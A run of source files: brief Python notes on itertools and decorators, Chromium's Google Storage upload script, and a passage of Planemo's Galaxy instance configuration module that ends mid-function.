list(chain(list1, list2)) #result is [1, 2, 3, 'a', 'b', 'c', 101, 102, 103, 'X', 'Y']
#count() - returns an iterator that generates consecutive integers until you stop it, otherwise it will go on forever
for i in count(10, 2.5):
if i <= 50:
print(i)
else:
break #result is printing the numbers between 10 and 50 inclusively, with a step of 2.5
#cycle() - returns an iterator that simply repeats the value given as argument infinitely; you have to find a way to break out of the infinite loop
a = range(11, 16)
for i in cycle(a):
print(i) #use Ctrl+C to break out of the infinite loop
#filterfalse() - returns the elements for which the function you give as argument returns False
list(filterfalse(lambda x: x < 5, [1, 2, 3, 4, 5, 6, 7])) #in Python 2 the result is [5, 6, 7]; in Python 3 there is no ifilter() like in Python 2, just filter() and filterfalse()
#islice() - performs slicing; we can specify a starting point of the slice, an end point and a step
list(islice(range(10), 2, 9, 2)) #result is [2, 4, 6, 8]
#Decorators - functions that take another function as a parameter and extend its functionality and behavior without modifying it
def my_decorator(target_function):
def function_wrapper():
return "Python is the " + target_function() + " programming language!"
return function_wrapper
@my_decorator
def target_function():
return "coolest"
target_function() #returns 'Python is the coolest programming language!'
#Threading
start() #simply starts or initiates the thread
join() #makes sure the program waits for all threads to terminate
th = threading.Thread(target = myfunction) #using the Thread class form the 'threading' module and telling it the target function to be executed using the 'target' argument
|
upload_to_google_storage.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Uploads files to Google Storage content addressed."""
import hashlib
import optparse
import os
import Queue
import re
import stat
import sys
import tarfile
import threading
import time
from download_from_google_storage import get_sha1
from download_from_google_storage import Gsutil
from download_from_google_storage import printer_worker
from download_from_google_storage import GSUTIL_DEFAULT_PATH
USAGE_STRING = """%prog [options] target [target2 ...].
Target is the file intended to be uploaded to Google Storage.
If target is "-", then a list of files will be taken from standard input
This script will generate a file (original filename).sha1 containing the
sha1 sum of the uploaded file.
It is recommended that the .sha1 file is checked into the repository,
the original file removed from the repository, and a hook added to the
DEPS file to call download_from_google_storage.py.
Example usages
--------------
Scan the current directory and upload all files larger than 1MB:
find . -name .svn -prune -o -size +1000k -type f -print0 | %prog -0 -b bkt -
(Replace "bkt" with the name of a writable bucket.)
"""
def get_md5(filename):
md5_calculator = hashlib.md5()
with open(filename, 'rb') as f:
while True:
chunk = f.read(1024*1024)
if not chunk:
break
md5_calculator.update(chunk)
return md5_calculator.hexdigest()
def get_md5_cached(filename):
"""Don't calculate the MD5 if we can find a .md5 file."""
# See if we can find an existing MD5 sum stored in a file.
if os.path.exists('%s.md5' % filename):
with open('%s.md5' % filename, 'rb') as f:
md5_match = re.search('([a-z0-9]{32})', f.read())
if md5_match:
return md5_match.group(1)
else:
md5_hash = get_md5(filename)
with open('%s.md5' % filename, 'wb') as f:
f.write(md5_hash)
return md5_hash
def _upload_worker(
thread_num, upload_queue, base_url, gsutil, md5_lock, force,
use_md5, stdout_queue, ret_codes, gzip):
while True:
filename, sha1_sum = upload_queue.get()
if not filename:
break
file_url = '%s/%s' % (base_url, sha1_sum)
if gsutil.check_call('ls', file_url)[0] == 0 and not force:
# File exists, check MD5 hash.
_, out, _ = gsutil.check_call_with_retries('ls', '-L', file_url)
etag_match = re.search('ETag:\s+([a-z0-9]{32})', out)
if etag_match:
remote_md5 = etag_match.group(1)
# Calculate the MD5 checksum to match it to Google Storage's ETag.
with md5_lock:
if use_md5:
local_md5 = get_md5_cached(filename)
else:
local_md5 = get_md5(filename)
if local_md5 == remote_md5:
stdout_queue.put(
'%d> File %s already exists and MD5 matches, upload skipped' %
(thread_num, filename))
continue
stdout_queue.put('%d> Uploading %s...' % (
thread_num, filename))
gsutil_args = ['cp']
if gzip:
gsutil_args.extend(['-z', gzip])
gsutil_args.extend([filename, file_url])
code, _, err = gsutil.check_call_with_retries(*gsutil_args)
if code != 0:
ret_codes.put(
(code,
'Encountered error on uploading %s to %s\n%s' %
(filename, file_url, err)))
continue
# Mark executable files with the header "x-goog-meta-executable: 1" which
# the download script will check for to preserve the executable bit.
if not sys.platform.startswith('win'):
if os.stat(filename).st_mode & stat.S_IEXEC:
code, _, err = gsutil.check_call_with_retries(
'setmeta', '-h', 'x-goog-meta-executable:1', file_url)
if not code:
ret_codes.put(
(code,
'Encountered error on setting metadata on %s\n%s' %
(file_url, err)))
def get_targets(args, parser, use_null_terminator):
if not args:
parser.error('Missing target.')
if len(args) == 1 and args[0] == '-':
# Take stdin as a newline or null seperated list of files.
if use_null_terminator:
return sys.stdin.read().split('\0')
else:
return sys.stdin.read().splitlines()
else:
return args
def upload_to_google_storage(
input_filenames, base_url, gsutil, force,
use_md5, num_threads, skip_hashing, gzip):
# We only want one MD5 calculation happening at a time to avoid HD thrashing.
md5_lock = threading.Lock()
# Start up all the worker threads plus the printer thread.
all_threads = []
ret_codes = Queue.Queue()
ret_codes.put((0, None))
upload_queue = Queue.Queue()
upload_timer = time.time()
stdout_queue = Queue.Queue()
printer_thread = threading.Thread(target=printer_worker, args=[stdout_queue])
printer_thread.daemon = True
printer_thread.start()
for thread_num in range(num_threads):
t = threading.Thread(
target=_upload_worker,
args=[thread_num, upload_queue, base_url, gsutil, md5_lock,
force, use_md5, stdout_queue, ret_codes, gzip])
t.daemon = True
t.start()
all_threads.append(t)
# We want to hash everything in a single thread since its faster.
# The bottleneck is in disk IO, not CPU.
hashing_start = time.time()
for filename in input_filenames:
if not os.path.exists(filename):
stdout_queue.put('Main> Error: %s not found, skipping.' % filename)
continue
if os.path.exists('%s.sha1' % filename) and skip_hashing:
stdout_queue.put(
'Main> Found hash for %s, sha1 calculation skipped.' % filename)
with open(filename + '.sha1', 'rb') as f:
sha1_file = f.read(1024)
if not re.match('^([a-z0-9]{40})$', sha1_file):
print >> sys.stderr, 'Invalid sha1 hash file %s.sha1' % filename
return 1
upload_queue.put((filename, sha1_file))
continue
stdout_queue.put('Main> Calculating hash for %s...' % filename)
sha1_sum = get_sha1(filename)
with open(filename + '.sha1', 'wb') as f:
f.write(sha1_sum)
stdout_queue.put('Main> Done calculating hash for %s.' % filename)
upload_queue.put((filename, sha1_sum))
hashing_duration = time.time() - hashing_start
# Wait for everything to finish.
for _ in all_threads:
upload_queue.put((None, None)) # To mark the end of the work queue.
for t in all_threads:
t.join()
stdout_queue.put(None)
printer_thread.join()
# Print timing information.
print 'Hashing %s files took %1f seconds' % (
len(input_filenames), hashing_duration)
print 'Uploading took %1f seconds' % (time.time() - upload_timer)
# See if we ran into any errors.
max_ret_code = 0
for ret_code, message in ret_codes.queue:
max_ret_code = max(ret_code, max_ret_code)
if message:
print >> sys.stderr, message
if not max_ret_code:
print 'Success!'
return max_ret_code
def create_archives(dirs):
archive_names = []
for name in dirs:
tarname = '%s.tar.gz' % name
with tarfile.open(tarname, 'w:gz') as tar:
tar.add(name)
archive_names.append(tarname)
return archive_names
def validate_archive_dirs(dirs):
# We don't allow .. in paths in our archives.
if any(map(lambda x: '..' in x, dirs)):
return False
# We only allow dirs.
if any(map(lambda x: not os.path.isdir(x), dirs)):
return False
# We don't allow sym links in our archives.
if any(map(os.path.islink, dirs)):
return False
# We required that the subdirectories we are archiving are all just below
# cwd.
return not any(map(lambda x: x not in next(os.walk('.'))[1], dirs))
def main():
parser = optparse.OptionParser(USAGE_STRING)
parser.add_option('-b', '--bucket',
help='Google Storage bucket to upload to.')
parser.add_option('-e', '--boto', help='Specify a custom boto file.')
parser.add_option('-a', '--archive', action='store_true',
help='Archive directory as a tar.gz file')
parser.add_option('-f', '--force', action='store_true',
help='Force upload even if remote file exists.')
parser.add_option('-g', '--gsutil_path', default=GSUTIL_DEFAULT_PATH,
help='Path to the gsutil script.')
parser.add_option('-m', '--use_md5', action='store_true',
help='Generate MD5 files when scanning, and don\'t check '
'the MD5 checksum if a .md5 file is found.')
parser.add_option('-t', '--num_threads', default=1, type='int',
help='Number of uploader threads to run.')
parser.add_option('-s', '--skip_hashing', action='store_true',
help='Skip hashing if .sha1 file exists.')
parser.add_option('-0', '--use_null_terminator', action='store_true',
help='Use \\0 instead of \\n when parsing '
'the file list from stdin. This is useful if the input '
'is coming from "find ... -print0".')
parser.add_option('-z', '--gzip', metavar='ext',
help='Gzip files which end in ext. '
'ext is a comma-separated list')
(options, args) = parser.parse_args()
# Enumerate our inputs.
input_filenames = get_targets(args, parser, options.use_null_terminator)
if options.archive:
if not validate_archive_dirs(input_filenames):
parser.error('Only directories just below cwd are valid entries when '
'using the --archive argument. Entries can not contain .. '
' and entries can not be symlinks. Entries was %s' %
input_filenames)
return 1
input_filenames = create_archives(input_filenames)
# Make sure we can find a working instance of gsutil.
if os.path.exists(GSUTIL_DEFAULT_PATH):
gsutil = Gsutil(GSUTIL_DEFAULT_PATH, boto_path=options.boto)
else:
gsutil = None
for path in os.environ["PATH"].split(os.pathsep):
if os.path.exists(path) and 'gsutil' in os.listdir(path):
gsutil = Gsutil(os.path.join(path, 'gsutil'), boto_path=options.boto)
if not gsutil:
parser.error('gsutil not found in %s, bad depot_tools checkout?' %
GSUTIL_DEFAULT_PATH)
base_url = 'gs://%s' % options.bucket
return upload_to_google_storage(
input_filenames, base_url, gsutil, options.force, options.use_md5,
options.num_threads, options.skip_hashing, options.gzip)
if __name__ == '__main__':
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
|
config.py
|
"""Abstractions for setting up a Galaxy instance."""
from __future__ import absolute_import
from __future__ import print_function
import abc
import contextlib
import os
import random
import shutil
import threading
from string import Template
from tempfile import mkdtemp
from galaxy.containers.docker_model import DockerVolume
from galaxy.tool_util.deps import docker_util
from galaxy.util.commands import argv_to_str
from pkg_resources import parse_version
from six import (
add_metaclass,
iteritems
)
from six.moves import shlex_quote
from planemo import git
from planemo.config import OptionSource
from planemo.deps import ensure_dependency_resolvers_conf_configured
from planemo.docker import docker_host_args
from planemo.galaxy.workflows import remote_runnable_to_workflow_id
from planemo.io import (
communicate,
kill_pid_file,
shell,
shell_join,
untar_to,
wait_on,
warn,
write_file,
)
from planemo.mulled import build_involucro_context
from planemo.shed import tool_shed_url
from planemo.virtualenv import DEFAULT_PYTHON_VERSION
from .api import (
DEFAULT_ADMIN_API_KEY,
gi,
user_api_key,
)
from .distro_tools import (
DISTRO_TOOLS_ID_TO_PATH
)
from .run import (
setup_common_startup_args,
setup_venv,
)
from .workflows import (
find_tool_ids,
import_workflow,
install_shed_repos,
)
NO_TEST_DATA_MESSAGE = (
"planemo couldn't find a target test-data directory, you should likely "
"create a test-data directory or pass an explicit path using --test_data."
)
WEB_SERVER_CONFIG_TEMPLATE = """
[server:${server_name}]
use = egg:Paste#http
port = ${port}
host = ${host}
use_threadpool = True
threadpool_kill_thread_limit = 10800
[app:main]
paste.app_factory = galaxy.web.buildapp:app_factory
static_dir = static/
"""
TOOL_CONF_TEMPLATE = """<toolbox>
<tool file="data_source/upload.xml" />
${tool_definition}
</toolbox>
"""
SHED_TOOL_CONF_TEMPLATE = """<?xml version="1.0"?>
<toolbox tool_path="${shed_tool_path}">
</toolbox>
"""
SHED_DATA_MANAGER_CONF_TEMPLATE = """<?xml version="1.0"?>
<data_managers>
</data_managers>
"""
EMPTY_JOB_METRICS_TEMPLATE = """<?xml version="1.0"?>
<job_metrics>
</job_metrics>
"""
TOOL_SHEDS_CONF = """<tool_sheds>
<tool_shed name="Target Shed" url="${shed_target_url}" />
</tool_sheds>
"""
JOB_CONFIG_LOCAL = """<job_conf>
<plugins>
<plugin id="planemo_runner" type="runner" load="galaxy.jobs.runners.local:LocalJobRunner" workers="4"/>
</plugins>
<handlers>
<handler id="main"/>
</handlers>
<destinations default="planemo_dest">
<destination id="planemo_dest" runner="planemo_runner">
<param id="require_container">${require_container}</param>
<param id="docker_enabled">${docker_enable}</param>
<param id="docker_sudo">${docker_sudo}</param>
<param id="docker_sudo_cmd">${docker_sudo_cmd}</param>
<param id="docker_cmd">${docker_cmd}</param>
${docker_host_param}
</destination>
<destination id="upload_dest" runner="planemo_runner">
<param id="docker_enabled">false</param>
</destination>
</destinations>
<tools>
<tool id="upload1" destination="upload_dest" />
</tools>
</job_conf>
"""
LOGGING_TEMPLATE = """
## Configure Python loggers.
[loggers]
keys = root,paste,displayapperrors,galaxydeps,galaxymasterapikey,galaxy
[handlers]
keys = console
[formatters]
keys = generic
[logger_root]
level = WARN
handlers = console
[logger_paste]
level = WARN
handlers = console
qualname = paste
propagate = 0
[logger_galaxydeps]
level = DEBUG
handlers = console
qualname = galaxy.tools.deps
propagate = 0
[logger_galaxymasterapikey]
level = WARN
handlers = console
qualname = galaxy.web.framework.webapp
propagate = 0
[logger_displayapperrors]
level = ERROR
handlers =
qualname = galaxy.datatypes.display_applications.application
propagate = 0
[logger_galaxy]
level = ${log_level}
handlers = console
qualname = galaxy
propagate = 0
[handler_console]
class = StreamHandler
args = (sys.stderr,)
level = DEBUG
formatter = generic
[formatter_generic]
format = %(asctime)s %(levelname)-5.5s [%(name)s] %(message)s
"""
REFGENIE_CONFIG_TEMPLATE = """
config_version: 0.3
genome_folder: '%s'
genome_servers: ['http://refgenomes.databio.org']
genomes: null
"""
EMPTY_TOOL_CONF_TEMPLATE = """<toolbox></toolbox>"""
DEFAULT_GALAXY_BRANCH = "master"
DEFAULT_GALAXY_SOURCE = "https://github.com/galaxyproject/galaxy"
CWL_GALAXY_SOURCE = "https://github.com/common-workflow-language/galaxy"
DATABASE_LOCATION_TEMPLATE = "sqlite:///%s?isolation_level=IMMEDIATE"
COMMAND_STARTUP_COMMAND = './scripts/common_startup.sh ${COMMON_STARTUP_ARGS}'
CLEANUP_IGNORE_ERRORS = True
DEFAULT_GALAXY_BRAND = 'Configured by Planemo'
DEFAULT_TOOL_INSTALL_TIMEOUT = 60 * 60 * 1
UNINITIALIZED = object()
@contextlib.contextmanager
def galaxy_config(ctx, runnables, **kwds):
"""Set up a ``GalaxyConfig`` in an auto-cleaned context."""
c = local_galaxy_config
if kwds.get("dockerize", False):
c = docker_galaxy_config
elif kwds.get("external", False):
c = external_galaxy_config
log_thread = None
try:
with c(ctx, runnables, **kwds) as config:
if kwds.get('daemon'):
log_thread = threading.Thread(target=read_log, args=(ctx, config.log_file))
log_thread.daemon = True
log_thread.start()
yield config
finally:
if log_thread:
log_thread.join(1)
def read_log(ctx, log_path):
log_fh = None
e = threading.Event()
try:
while e:
if os.path.exists(log_path):
if not log_fh:
# Open in append so we start at the end of the log file
log_fh = open(log_path, 'a+')
log_lines = log_fh.read()
if log_lines:
ctx.log(log_lines)
e.wait(1)
finally:
if log_fh:
log_fh.close()
def simple_docker_volume(path):
path = os.path.abspath(path)
return DockerVolume("%s:%s:rw" % (path, path))
@contextlib.contextmanager
def docker_galaxy_config(ctx, runnables, for_tests=False, **kwds):
"""Set up a ``GalaxyConfig`` for Docker container."""
test_data_dir = _find_test_data(runnables, **kwds)
with _config_directory(ctx, **kwds) as config_directory:
def config_join(*args):
return os.path.join(config_directory, *args)
ensure_dependency_resolvers_conf_configured(ctx, kwds, os.path.join(config_directory, "resolvers_conf.xml"))
_handle_job_metrics(config_directory, kwds)
_handle_refgenie_config(config_directory, kwds)
shed_tool_conf = "config/shed_tool_conf.xml"
all_tool_paths = _all_tool_paths(runnables, **kwds)
tool_directories = set([]) # Things to mount...
for tool_path in all_tool_paths:
directory = os.path.dirname(os.path.normpath(tool_path))
if os.path.exists(directory):
tool_directories.add(directory)
# TODO: remap these.
tool_volumes = []
for tool_directory in tool_directories:
volume = simple_docker_volume(tool_directory)
tool_volumes.append(volume)
empty_tool_conf = config_join("empty_tool_conf.xml")
tool_conf = config_join("tool_conf.xml")
shed_tool_path = kwds.get("shed_tool_path") or config_join("shed_tools")
_ensure_directory(shed_tool_path)
sheds_config_path = _configure_sheds_config_file(
ctx, config_directory, **kwds
)
port = _get_port(kwds)
properties = _shared_galaxy_properties(config_directory, kwds, for_tests=for_tests)
_handle_container_resolution(ctx, kwds, properties)
master_api_key = _get_master_api_key(kwds)
template_args = dict(
shed_tool_path=shed_tool_path,
tool_conf=tool_conf,
)
tool_config_file = "%s,%s" % (tool_conf, shed_tool_conf)
_write_tool_conf(ctx, all_tool_paths, tool_conf)
write_file(empty_tool_conf, EMPTY_TOOL_CONF_TEMPLATE)
properties.update(dict(
tool_config_file=tool_config_file,
tool_sheds_config_file=sheds_config_path,
migrated_tools_config=empty_tool_conf,
))
server_name = "planemo%d" % random.randint(0, 100000)
# Value substitutions in Galaxy properties - for consistency with
# non-Dockerized version.
template_args = dict(
)
env = _build_env_for_galaxy(properties, template_args)
env["NONUSE"] = "nodejs,proftp,reports"
if ctx.verbose:
env["GALAXY_LOGGING"] = "full"
# TODO: setup FTP upload dir and disable FTP server in container.
_build_test_env(properties, env)
docker_target_kwds = docker_host_args(**kwds)
volumes = tool_volumes + [simple_docker_volume(config_directory)]
export_directory = kwds.get("export_directory", None)
if export_directory is not None:
volumes.append(DockerVolume("%s:/export:rw" % export_directory))
# TODO: Allow this to real Docker volumes and allow multiple.
extra_volume = kwds.get("docker_extra_volume")
if extra_volume:
volumes.append(simple_docker_volume(extra_volume))
yield DockerGalaxyConfig(
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
docker_target_kwds=docker_target_kwds,
volumes=volumes,
export_directory=export_directory,
kwds=kwds,
)
@contextlib.contextmanager
def local_galaxy_config(ctx, runnables, for_tests=False, **kwds):
"""Set up a ``GalaxyConfig`` in an auto-cleaned context."""
test_data_dir = _find_test_data(runnables, **kwds)
tool_data_table = _find_tool_data_table(
runnables,
test_data_dir=test_data_dir,
**kwds
)
data_manager_config_paths = [r.data_manager_conf_path for r in runnables if r.data_manager_conf_path]
galaxy_root = _find_galaxy_root(ctx, **kwds)
install_galaxy = kwds.get("install_galaxy", False)
if galaxy_root is not None:
if os.path.isdir(galaxy_root) and not os.listdir(galaxy_root):
os.rmdir(galaxy_root)
if os.path.isdir(galaxy_root) and install_galaxy:
raise Exception("%s is an existing non-empty directory, cannot install Galaxy again" % galaxy_root)
# Duplicate block in docker variant above.
if kwds.get("mulled_containers", False) and not kwds.get("docker", False):
if ctx.get_option_source("docker") != OptionSource.cli:
kwds["docker"] = True
else:
raise Exception("Specified no docker and mulled containers together.")
with _config_directory(ctx, **kwds) as config_directory:
def config_join(*args):
return os.path.join(config_directory, *args)
install_env = {}
if kwds.get('galaxy_skip_client_build', True):
install_env['GALAXY_SKIP_CLIENT_BUILD'] = '1'
if galaxy_root is None:
galaxy_root = config_join("galaxy-dev")
if not os.path.isdir(galaxy_root):
_build_eggs_cache(ctx, install_env, kwds)
_install_galaxy(ctx, galaxy_root, install_env, kwds)
if parse_version(kwds.get('galaxy_python_version') or DEFAULT_PYTHON_VERSION) >= parse_version('3'):
# on python 3 we use gunicorn,
# which requires 'main' as server name
server_name = 'main'
else:
server_name = "planemo%d" % random.randint(0, 100000)
# Once we don't have to support earlier than 18.01 - try putting these files
# somewhere better than with Galaxy.
log_file = "%s.log" % server_name
pid_file = "%s.pid" % server_name
ensure_dependency_resolvers_conf_configured(ctx, kwds, os.path.join(config_directory, "resolvers_conf.xml"))
_handle_job_config_file(config_directory, server_name, kwds)
_handle_job_metrics(config_directory, kwds)
_handle_refgenie_config(config_directory, kwds)
file_path = kwds.get("file_path") or config_join("files")
_ensure_directory(file_path)
tool_dependency_dir = kwds.get("tool_dependency_dir") or config_join("deps")
_ensure_directory(tool_dependency_dir)
shed_tool_conf = kwds.get("shed_tool_conf") or config_join("shed_tools_conf.xml")
all_tool_paths = _all_tool_paths(runnables, **kwds)
empty_tool_conf = config_join("empty_tool_conf.xml")
tool_conf = config_join("tool_conf.xml")
shed_data_manager_config_file = config_join("shed_data_manager_conf.xml")
shed_tool_path = kwds.get("shed_tool_path") or config_join("shed_tools")
_ensure_directory(shed_tool_path)
sheds_config_path = _configure_sheds_config_file(
ctx, config_directory, **kwds
)
database_location = config_join("galaxy.sqlite")
master_api_key = _get_master_api_key(kwds)
dependency_dir = os.path.join(config_directory, "deps")
_ensure_directory(shed_tool_path)
port = _get_port(kwds)
template_args = dict(
port=port,
host=kwds.get("host", "127.0.0.1"),
server_name=server_name,
temp_directory=config_directory,
shed_tool_path=shed_tool_path,
database_location=database_location,
tool_conf=tool_conf,
debug=kwds.get("debug", "true"),
id_secret=kwds.get("id_secret", "test_secret"),
log_level="DEBUG" if ctx.verbose else "INFO",
)
tool_config_file = "%s,%s" % (tool_conf, shed_tool_conf)
# Setup both galaxy_email and older test user test@bx.psu.edu
# as admins for command_line, etc...
properties = _shared_galaxy_properties(config_directory, kwds, for_tests=for_tests)
properties.update(dict(
server_name="main",
ftp_upload_dir_template="${ftp_upload_dir}",
ftp_upload_purge="False",
ftp_upload_dir=test_data_dir or os.path.abspath('.'),
ftp_upload_site="Test Data",
check_upload_content="False",
tool_dependency_dir=dependency_dir,
file_path=file_path,
new_file_path="${temp_directory}/tmp",
tool_config_file=tool_config_file,
tool_sheds_config_file=sheds_config_path,
manage_dependency_relationships="False",
job_working_directory="${temp_directory}/job_working_directory",
template_cache_path="${temp_directory}/compiled_templates",
citation_cache_type="file",
citation_cache_data_dir="${temp_directory}/citations/data",
citation_cache_lock_dir="${temp_directory}/citations/lock",
database_auto_migrate="True",
enable_beta_tool_formats="True",
id_secret="${id_secret}",
log_level="${log_level}",
debug="${debug}",
watch_tools="auto",
default_job_shell="/bin/bash", # For conda dependency resolution
tool_data_table_config_path=tool_data_table,
data_manager_config_file=",".join(data_manager_config_paths) or None, # without 'or None' may raise IOError in galaxy (see #946)
integrated_tool_panel_config=("${temp_directory}/"
"integrated_tool_panel_conf.xml"),
migrated_tools_config=empty_tool_conf,
test_data_dir=test_data_dir, # TODO: make gx respect this
shed_data_manager_config_file=shed_data_manager_config_file,
))
_handle_container_resolution(ctx, kwds, properties)
write_file(config_join("logging.ini"), _sub(LOGGING_TEMPLATE, template_args))
properties["database_connection"] = _database_connection(database_location, **kwds)
_handle_kwd_overrides(properties, kwds)
# TODO: consider following property
# watch_tool = False
# datatypes_config_file = config/datatypes_conf.xml
# welcome_url = /static/welcome.html
# logo_url = /
# sanitize_all_html = True
# serve_xss_vulnerable_mimetypes = False
# track_jobs_in_database = None
# outputs_to_working_directory = False
# retry_job_output_collection = 0
env = _build_env_for_galaxy(properties, template_args)
env.update(install_env)
_build_test_env(properties, env)
env['GALAXY_TEST_SHED_TOOL_CONF'] = shed_tool_conf
env['GALAXY_TEST_DBURI'] = properties["database_connection"]
env["GALAXY_TEST_UPLOAD_ASYNC"] = "false"
env["GALAXY_TEST_LOGGING_CONFIG"] = config_join("logging.ini")
env["GALAXY_DEVELOPMENT_ENVIRONMENT"] = "1"
# Following are needed in 18.01 to prevent Galaxy from changing log and pid.
# https://github.com/galaxyproject/planemo/issues/788
env["GALAXY_LOG"] = log_file
env["GALAXY_PID"] = pid_file
web_config = _sub(WEB_SERVER_CONFIG_TEMPLATE, template_args)
write_file(config_join("galaxy.ini"), web_config)
_write_tool_conf(ctx, all_tool_paths, tool_conf)
write_file(empty_tool_conf, EMPTY_TOOL_CONF_TEMPLATE)
shed_tool_conf_contents = _sub(SHED_TOOL_CONF_TEMPLATE, template_args)
# Write a new shed_tool_conf.xml if needed.
write_file(shed_tool_conf, shed_tool_conf_contents, force=False)
write_file(shed_data_manager_config_file, SHED_DATA_MANAGER_CONF_TEMPLATE)
yield LocalGalaxyConfig(
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
galaxy_root,
kwds,
)
def _all_tool_paths(runnables, **kwds):
tool_paths = [r.path for r in runnables if r.has_tools and not r.data_manager_conf_path]
all_tool_paths = list(tool_paths) + list(kwds.get("extra_tools", []))
for runnable in runnables:
if runnable.type.name == "galaxy_workflow":
tool_ids = find_tool_ids(runnable.path)
for tool_id in tool_ids:
tool_paths = DISTRO_TOOLS_ID_TO_PATH.get(tool_id)
if tool_paths:
if isinstance(tool_paths, str):
tool_paths = [tool_paths]
all_tool_paths.extend(tool_paths)
return all_tool_paths
def _shared_galaxy_properties(config_directory, kwds, for_tests):
"""Setup properties useful for local and Docker Galaxy instances.
Most things related to paths, etc... are very different between Galaxy
modalities and many taken care of internally to the container in that mode.
But this method sets up API stuff, tool, and job stuff that can be shared.
"""
master_api_key = _get_master_api_key(kwds)
user_email = _user_email(kwds)
properties = {
'master_api_key': master_api_key,
'admin_users': "%s,test@bx.psu.edu" % user_email,
'expose_dataset_path': "True",
'cleanup_job': 'never',
'collect_outputs_from': "job_working_directory",
'allow_path_paste': "True",
'check_migrate_tools': "False",
'use_cached_dependency_manager': str(kwds.get("conda_auto_install", False)),
'brand': kwds.get("galaxy_brand", DEFAULT_GALAXY_BRAND),
'strict_cwl_validation': str(not kwds.get("non_strict_cwl", False)),
}
if kwds.get("galaxy_single_user", True):
properties['single_user'] = user_email
if for_tests:
empty_dir = os.path.join(config_directory, "empty")
_ensure_directory(empty_dir)
properties["tour_config_dir"] = empty_dir
properties["interactive_environment_plugins_directory"] = empty_dir
properties["visualization_plugins_directory"] = empty_dir
properties["refgenie_config_file"] = kwds.get('refgenie_config_file', '')
return properties
@contextlib.contextmanager
def external_galaxy_config(ctx, runnables, for_tests=False, **kwds):
yield BaseGalaxyConfig(
ctx=ctx,
galaxy_url=kwds.get("galaxy_url", None),
master_api_key=_get_master_api_key(kwds),
user_api_key=kwds.get("galaxy_user_key", None),
runnables=runnables,
kwds=kwds
)
def _get_master_api_key(kwds):
master_api_key = kwds.get("galaxy_admin_key") or DEFAULT_ADMIN_API_KEY
return master_api_key
def _get_port(kwds):
port = int(kwds.get("port", 9090))
return port
def _user_email(kwds):
user_email = kwds.get("galaxy_email")
return user_email
@contextlib.contextmanager
def _config_directory(ctx, **kwds):
config_directory = kwds.get("config_directory", None)
created_config_directory = False
if not config_directory:
created_config_directory = True
config_directory = os.path.realpath(mkdtemp())
ctx.vlog("Created directory for Galaxy configuration [%s]" % config_directory)
try:
yield config_directory
finally:
cleanup = not kwds.get("no_cleanup", False)
if created_config_directory and cleanup:
shutil.rmtree(config_directory)
@add_metaclass(abc.ABCMeta)
class GalaxyInterface(object):
"""Abstraction around a Galaxy instance.
Description of a Galaxy instance and how to interact with it - this could
potentially be a remote, already running instance or an instance Planemo manages
to execute some task(s).
"""
@abc.abstractproperty
def gi(self):
"""Return an admin bioblend Galaxy instance for API interactions."""
@abc.abstractproperty
def user_gi(self):
"""Return a user-backed bioblend Galaxy instance for API interactions."""
@abc.abstractmethod
def install_repo(self, *args, **kwds):
"""Install specified tool shed repository."""
@abc.abstractproperty
def tool_shed_client(self):
"""Return a admin bioblend tool shed client."""
@abc.abstractmethod
def wait_for_all_installed(self):
"""Wait for all queued up repositories installs to complete."""
@abc.abstractmethod
def install_workflows(self):
"""Install all workflows configured with these planemo arguments."""
@abc.abstractmethod
def workflow_id(self, path):
"""Get installed workflow API ID for input path."""
@abc.abstractproperty
def version_major(self):
"""Return target Galaxy version."""
@abc.abstractproperty
def user_api_config(self):
"""Return the API indicated configuration for user session.
Calling .config.get_config() with admin GI session would yield
a different object (admins have different view of Galaxy's
configuration).
"""
@property
def user_is_admin(self):
return self.user_api_config["is_admin_user"]
@add_metaclass(abc.ABCMeta)
class GalaxyConfig(GalaxyInterface):
"""Specialization of GalaxyInterface for Galaxy instances Planemo manages itself.
This assumes more than an API connection is available - Planemo needs to be able to
start and stop the Galaxy instance, recover logs, etc... There are currently two
implementations - a locally executed Galaxy and one running inside a Docker containe
"""
@abc.abstractproperty
def kill(self):
"""Stop the running instance."""
@abc.abstractmethod
def startup_command(self, ctx, **kwds):
"""Return a shell command used to startup this instance.
Among other common planmo kwds, this should respect the
``daemon`` keyword.
"""
@abc.abstractproperty
def log_contents(self):
"""Retrieve text of log for running Galaxy instance."""
@abc.abstractmethod
def cleanup(self):
"""Cleanup allocated resources to run this instance."""
@abc.abstractproperty
def use_path_paste(self):
"""Use path paste to upload data.
This will only be an option if the target user key is an
admin user key.
"""
class BaseGalaxyConfig(GalaxyInterface):
def __init__(
self,
ctx,
galaxy_url,
master_api_key,
user_api_key,
runnables,
kwds,
):
self._ctx = ctx
self.galaxy_url = galaxy_url
self.master_api_key = master_api_key
self._user_api_key = user_api_key
self.runnables = runnables
self._kwds = kwds
self._workflow_ids = {}
self._target_version = UNINITIALIZED
self._target_user_config = UNINITIALIZED
@property
def gi(self):
assert self.galaxy_url
return gi(url=self.galaxy_url, key=self.master_api_key)
@property
def user_gi(self):
user_api_key = self.user_api_key
assert user_api_key
return self._gi_for_key(user_api_key)
@property
def user_api_key(self):
# TODO: thread-safe
if self._user_api_key is None:
# TODO: respect --galaxy_email - seems like a real bug
self._user_api_key = user_api_key(self.gi)
return self._user_api_key
def _gi_for_key(self, key):
assert self.galaxy_url
return gi(url=self.galaxy_url, key=key)
def install_repo(self, *args, **kwds):
self.tool_shed_client.install_repository_revision(
*args, **kwds
)
@property
def tool_shed_client(self):
return self.gi.toolShed
def wait_for_all_installed(self):
def status_ready(repo):
status = repo["status"]
if status in ["Installing", "New"]:
return None
if status == "Installed":
return True
raise Exception("Error installing repo status is %s" % status)
def ready():
repos = self.tool_shed_client.get_repositories()
ready = all(map(status_ready, repos))
return ready or None
wait_on(ready, "galaxy tool installation", timeout=DEFAULT_TOOL_INSTALL_TIMEOUT)
def install_workflows(self):
for runnable in self.runnables:
if runnable.type.name in ["galaxy_workflow", "cwl_workflow"] and not runnable.is_remote_workflow_uri:
self._install_workflow(runnable)
def _install_workflow(self, runnable):
if self._kwds.get("shed_install") and (self._kwds.get("engine") != "external_galaxy" or self._kwds.get("galaxy_admin_key")):
install_shed_repos(runnable,
self.gi,
self._kwds.get("ignore_dependency_problems", False),
self._kwds.get("install_tool_dependencies", False),
